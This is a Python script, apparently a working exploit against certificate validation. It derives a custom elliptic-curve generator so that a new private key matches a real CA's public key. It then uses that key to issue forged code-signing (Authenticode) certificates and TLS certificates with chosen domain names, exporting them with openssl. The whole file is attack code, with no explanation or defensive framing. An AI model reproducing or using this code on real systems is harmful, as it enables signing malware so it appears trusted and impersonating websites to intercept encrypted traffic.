def exploit_certificate( certificate: x509.Certificate, ) -> Tuple[ecdsa.keys.SigningKey, keys.ECPrivateKey]: curve_name = certificate.public_key["algorithm"][ "parameters"].chosen.native ec_private_key = generate_ec_private_key(curve_name) k = ec_private_key["private_key"].native parameters = ec_private_key["parameters"].chosen nist_curve = curve_from_ec_parameters(parameters) Qx, Qy = certificate.public_key["public_key"].to_coords() Gx, Gy = get_exploit_generator(k, Qx, Qy, nist_curve) parameters["base"] = keys.ECPoint.from_coords(Gx, Gy) ec_private_key["parameters"] = parameters ec_private_key["public_key"] = certificate.public_key["public_key"] certificate.public_key["algorithm"]["parameters"] = parameters exploit_curve = curve_from_ec_parameters(parameters) signing_key = ecdsa.keys.SigningKey.from_secret_exponent( k, curve=exploit_curve) signed_digest_algorithm = x509.SignedDigestAlgorithm( {"algorithm": "sha256_ecdsa"}) certificate["tbs_certificate"]["signature"] = signed_digest_algorithm certificate["signature_algorithm"] = signed_digest_algorithm sign_certificate(signing_key, certificate) return (signing_key, ec_private_key)
def write_authenticode_certificate( ca_cert: x509.Certificate, ca_cert_orig: x509.Certificate, signing_key: ecdsa.keys.SigningKey, name: str, subject: x509.Name, ) -> None: private_key, public_key = generate_private_key("rsa:4096") signed_digest_algorithm = x509.SignedDigestAlgorithm( {"algorithm": "sha256_ecdsa"}) certificate = x509.Certificate({ "tbs_certificate": { "version": "v3", "serial_number": random_serial_number(), "signature": signed_digest_algorithm, "issuer": ca_cert.subject, "validity": { "not_before": x509.UTCTime( datetime.datetime(2018, 1, 1, tzinfo=datetime.timezone.utc)), "not_after": x509.UTCTime( datetime.datetime(2021, 1, 1, tzinfo=datetime.timezone.utc)), }, "subject": subject, "subject_public_key_info": public_key, "extensions": [ { "extn_id": "basic_constraints", "critical": True, "extn_value": { "ca": False }, }, { "extn_id": "key_usage", "critical": True, "extn_value": {"digital_signature"}, }, { "extn_id": "extended_key_usage", "critical": True, "extn_value": [ "code_signing", "1.3.6.1.4.1.311.2.1.21", "1.3.6.1.4.1.311.2.1.22", ], }, ], }, "signature_algorithm": signed_digest_algorithm, }) sign_certificate(signing_key, certificate) with open(name + ".crt", "wb") as f: write_pem(f, certificate, "CERTIFICATE") write_pem(f, ca_cert_orig, "CERTIFICATE") write_pem(f, ca_cert, "CERTIFICATE") with open(name + ".key", "wb") as f: write_pem(f, private_key, "PRIVATE KEY") subprocess.check_call(( "openssl", "crl2pkcs7", "-nocrl", "-certfile", name + ".crt", "-outform", "DER", "-out", name + ".spc", )) subprocess.check_call(( "openssl", "rsa", "-in", name + ".key", "-outform", "PVK", "-pvk-none", "-out", name + ".pvk", ))
def write_tls_certificate( ca_cert: x509.Certificate, ca_cert_orig: x509.Certificate, signing_key: ecdsa.keys.SigningKey, name: str, subject: x509.Name, subject_alt_names: Sequence[str], ) -> None: private_key, public_key = generate_private_key("rsa:4096") signed_digest_algorithm = x509.SignedDigestAlgorithm( {"algorithm": "sha256_ecdsa"}) certificate = x509.Certificate({ "tbs_certificate": { "version": "v3", "serial_number": random_serial_number(), "signature": signed_digest_algorithm, "issuer": ca_cert_orig.subject, "validity": { "not_before": x509.UTCTime( datetime.datetime(2018, 1, 1, tzinfo=datetime.timezone.utc)), "not_after": x509.UTCTime( datetime.datetime(2021, 1, 1, tzinfo=datetime.timezone.utc)), }, "subject": subject, "subject_public_key_info": public_key, "extensions": [ { "extn_id": "basic_constraints", "critical": True, "extn_value": { "ca": False }, }, { "extn_id": "subject_alt_name", "critical": False, "extn_value": [ x509.GeneralName({"dns_name": dns_name}) for dns_name in subject_alt_names ], }, { "extn_id": "certificate_policies", "critical": False, "extn_value": [ { "policy_identifier": "1.3.6.1.4.1.6449.1.2.1.5.1" }, ], }, ], }, "signature_algorithm": signed_digest_algorithm, }) sign_certificate(signing_key, certificate) with open(name + ".crt", "wb") as f: write_pem(f, certificate, "CERTIFICATE") write_pem(f, ca_cert_orig, "CERTIFICATE") write_pem(f, ca_cert, "CERTIFICATE") with open(name + ".key", "wb") as f: write_pem(f, private_key, "PRIVATE KEY") write_pem(f, certificate, "CERTIFICATE") write_pem(f, ca_cert_orig, "CERTIFICATE") write_pem(f, ca_cert, "CERTIFICATE")